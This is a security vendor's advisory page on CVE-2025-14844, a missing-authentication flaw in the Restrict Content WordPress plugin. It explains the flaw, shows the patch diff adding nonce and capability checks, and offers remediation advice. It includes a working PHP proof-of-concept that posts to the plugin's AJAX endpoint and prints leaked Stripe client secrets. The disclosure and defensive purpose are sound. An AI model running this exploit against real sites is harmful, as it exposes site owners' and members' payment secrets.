What is CVE-2025-14844?

CVE-2025-14844 is a security vulnerability in the Membership Plugin – Restrict Content for WordPress, specifically in version 3.2.16 and earlier. It involves missing authentication checks in the ‘rcp_stripe_create_setup_intent_for_saved_card’ function, allowing unauthenticated attackers to access sensitive Stripe SetupIntent client secrets.

How does this vulnerability work?

The vulnerability allows attackers to send a POST request to the WordPress AJAX endpoint without authentication. The missing capability checks mean that attackers can retrieve sensitive data, specifically the Stripe SetupIntent ‘client_secret’, which can be used to manipulate payment processes.

Who is affected by this vulnerability?

Any WordPress site using the Restrict Content plugin version 3.2.16 or earlier is affected. Site administrators should check their plugin version to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Restrict Content plugin installed. If it is version 3.2.16 or earlier, your site is at risk of exploitation.

How can I fix this vulnerability?

To fix CVE-2025-14844, update the Restrict Content plugin to version 3.2.17 or later, which includes the necessary security patches. Regularly updating all plugins is a best practice to maintain site security.

What does the CVSS score of 8.2 indicate?

A CVSS score of 8.2 indicates a high severity vulnerability. This means that successful exploitation could lead to significant security breaches, including unauthorized access to sensitive information.

What practical risks does this vulnerability pose?

If exploited, this vulnerability could allow attackers to access sensitive payment information, potentially leading to unauthorized transactions or manipulation of user accounts. This compromises both payment integrity and user data confidentiality.

What are nonce checks and why are they important?

Nonce checks are security measures that ensure requests are legitimate and originate from authenticated users. They help prevent replay attacks and unauthorized access to sensitive functions, which is critical in protecting payment processes.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX endpoint, successfully retrieving sensitive client secret information without authentication.

How can I protect my site from future vulnerabilities?

To protect your site, regularly update all plugins and themes, implement security plugins, conduct routine security audits, and monitor for unusual activity. Additionally, consider using a web application firewall.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Restrict Content plugin until it can be updated to prevent any potential exploitation. Review user access permissions and limit access to sensitive areas of your site.

Where can I find more information about this vulnerability?

More information about CVE-2025-14844 can be found in the official CVE database, security advisories from the plugin developers, and security-focused websites that track vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-14844: Membership Plugin – Restrict Content <= 3.2.16 – Missing Authentication to Insecure Direct Object Reference and Sensitive Information Exposure (restrict-content)

CVE ID CVE-2025-14844

Plugin restrict-content

Severity High (CVSS 8.2)

CWE 639

Vulnerable Version 3.2.16

Patched Version 3.2.17

Disclosed January 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14844:
This vulnerability is an Insecure Direct Object Reference (IDOR) and information exposure flaw in the Restrict Content WordPress plugin. The issue resides in the Stripe payment gateway functionality, allowing unauthenticated attackers to retrieve sensitive Stripe SetupIntent client secrets for any membership. The CVSS score of 8.2 reflects the high severity of this authentication bypass.

The root cause is the `rcp_stripe_create_setup_intent_for_saved_card` function in `/restrict-content/core/includes/gateways/stripe/functions.php`. The function lacked both a capability check to verify user authentication and a nonce verification to validate request intent. This allowed direct, unauthenticated access to the AJAX handler. The vulnerability was present because the function executed its logic without confirming the user had the ‘read’ capability or a valid nonce.

Exploitation involves sending a POST request to the WordPress admin AJAX endpoint, `/wp-admin/admin-ajax.php`. The attacker sets the `action` parameter to `rcp_stripe_create_setup_intent_for_saved_card`. No other specific parameters are required to trigger the leak, as the missing checks allow the function to proceed and return the Stripe SetupIntent data, which includes the sensitive `client_secret` value, for a membership context.

The patch adds two critical security controls. First, it introduces a nonce check via `check_ajax_referer(‘rcp_stripe_create_setup_intent_for_saved_card’, ‘nonce’)`. Second, it adds a capability check `if ( ! current_user_can( ‘read’ ) )` to ensure the requesting user is at least a registered subscriber. The nonce is also added to the localized script variables in the same file, ensuring legitimate front-end requests include it. These changes collectively enforce authentication and request validation.

Successful exploitation leads to the exposure of Stripe SetupIntent `client_secret` values. An attacker could use these secrets to manipulate payment processes, potentially link unauthorized payment methods to user accounts, or interfere with subscription flows. This constitutes a significant breach of payment integrity and user data confidentiality within the membership system.

Differential between vulnerable and patched code

Code Diff

--- a/restrict-content/core/includes/class-restrict-content.php
+++ b/restrict-content/core/includes/class-restrict-content.php
@@ -26,7 +26,7 @@
 	 * @since 3.0
 	 */
 	final class Restrict_Content_Pro {
-		const VERSION = '3.5.48';
+		const VERSION = '3.5.49';

 		/**
 		 * Stores the base slug for the extension.
--- a/restrict-content/core/includes/gateways/stripe/functions.php
+++ b/restrict-content/core/includes/gateways/stripe/functions.php
@@ -148,6 +148,7 @@
 		'confirm_delete_card' => esc_html__( 'Are you sure you want to delete this payment method?', 'rcp' ),
 		'enter_card_name'     => __( 'Please enter a card holder name', 'rcp' ),
 		'pleasewait'          => __( 'Please Wait . . . ', 'rcp' ),
+		'nonce'                => wp_create_nonce( 'rcp_stripe_create_setup_intent_for_saved_card' ),
 	) );

 	try {
@@ -846,6 +847,12 @@
  * @return void
  */
 function rcp_stripe_create_setup_intent_for_saved_card() {
+	check_ajax_referer( 'rcp_stripe_create_setup_intent_for_saved_card', 'nonce' );
+
+	// Check if the user is at least a registered user.
+	if ( ! current_user_can( 'read' ) ) {
+		wp_send_json_error( __( 'You are not authorized to perform this action.', 'rcp' ) );
+	}

 	global $rcp_options;

--- a/restrict-content/legacy/restrictcontent.php
+++ b/restrict-content/legacy/restrictcontent.php
@@ -21,7 +21,7 @@
 }

 if ( ! defined( 'RC_PLUGIN_VERSION' ) ) {
-	define( 'RC_PLUGIN_VERSION', '3.2.16' );
+	define( 'RC_PLUGIN_VERSION', '3.2.17' );
 }

 if ( ! defined( 'RC_PLUGIN_DIR' ) ) {
--- a/restrict-content/restrictcontent.php
+++ b/restrict-content/restrictcontent.php
@@ -3,7 +3,7 @@
  * Plugin Name: Restrict Content
  * Plugin URI: https://restrictcontentpro.com
  * Description: Set up a complete membership system for your WordPress site and deliver premium content to your members. Unlimited membership packages, membership management, discount codes, registration / login forms, and more.
- * Version: 3.2.16
+ * Version: 3.2.17
  * Author: StellarWP
  * Author URI: https://stellarwp.com/
  * Requires at least: 6.0
@@ -18,7 +18,7 @@
 define('RCP_PLUGIN_FILE', __FILE__);
 define('RCP_ROOT', plugin_dir_path(__FILE__));
 define('RCP_WEB_ROOT', plugin_dir_url(__FILE__));
-define('RCF_VERSION', '3.2.16');
+define('RCF_VERSION', '3.2.17');

 // Load Strauss autoload.
 require_once plugin_dir_path( __FILE__ ) . 'vendor/strauss/autoload.php';

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-14844 - Membership Plugin – Restrict Content <= 3.2.16 - Missing Authentication to Insecure Direct Object Reference and Sensitive Information Exposure

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';

// The vulnerable AJAX action hook.
$post_data = array('action' => 'rcp_stripe_create_setup_intent_for_saved_card');

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Following redirects is often necessary for WordPress admin endpoints.
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response Body:n";
echo $response;

// The response is expected to be JSON.
// A successful exploit on a vulnerable version will return a JSON object containing a 'client_secret' field.
$json_response = json_decode($response, true);
if (json_last_error() === JSON_ERROR_NONE && isset($json_response['client_secret'])) {
    echo "n[SUCCESS] Stripe client_secret leaked: " . $json_response['client_secret'] . "n";
} else {
    echo "n[FAILURE] Exploit may have failed or the site is patched.n";
}

?>

Frequently Asked Questions

What is CVE-2025-14844?
Overview of the vulnerability
CVE-2025-14844 is a security vulnerability in the Membership Plugin – Restrict Content for WordPress, specifically in version 3.2.16 and earlier. It involves missing authentication checks in the ‘rcp_stripe_create_setup_intent_for_saved_card’ function, allowing unauthenticated attackers to access sensitive Stripe SetupIntent client secrets.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a POST request to the WordPress AJAX endpoint without authentication. The missing capability checks mean that attackers can retrieve sensitive data, specifically the Stripe SetupIntent ‘client_secret’, which can be used to manipulate payment processes.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Restrict Content plugin version 3.2.16 or earlier is affected. Site administrators should check their plugin version to determine if they are at risk.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Restrict Content plugin installed. If it is version 3.2.16 or earlier, your site is at risk of exploitation.
How can I fix this vulnerability?
Mitigation steps
To fix CVE-2025-14844, update the Restrict Content plugin to version 3.2.17 or later, which includes the necessary security patches. Regularly updating all plugins is a best practice to maintain site security.
What does the CVSS score of 8.2 indicate?
Understanding severity levels
A CVSS score of 8.2 indicates a high severity vulnerability. This means that successful exploitation could lead to significant security breaches, including unauthorized access to sensitive information.
What practical risks does this vulnerability pose?
Consequences of exploitation
If exploited, this vulnerability could allow attackers to access sensitive payment information, potentially leading to unauthorized transactions or manipulation of user accounts. This compromises both payment integrity and user data confidentiality.
What are nonce checks and why are they important?
Role of nonce in security
Nonce checks are security measures that ensure requests are legitimate and originate from authenticated users. They help prevent replay attacks and unauthorized access to sensitive functions, which is critical in protecting payment processes.
What does the proof of concept demonstrate?
Understanding the exploit
The proof of concept illustrates how an attacker can exploit the vulnerability by sending a crafted POST request to the vulnerable AJAX endpoint, successfully retrieving sensitive client secret information without authentication.
How can I protect my site from future vulnerabilities?
Best practices for security
To protect your site, regularly update all plugins and themes, implement security plugins, conduct routine security audits, and monitor for unusual activity. Additionally, consider using a web application firewall.
What should I do if I cannot update the plugin immediately?
Temporary mitigation measures
If immediate updating is not possible, consider disabling the Restrict Content plugin until it can be updated to prevent any potential exploitation. Review user access permissions and limit access to sensitive areas of your site.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2025-14844 can be found in the official CVE database, security advisories from the plugin developers, and security-focused websites that track vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations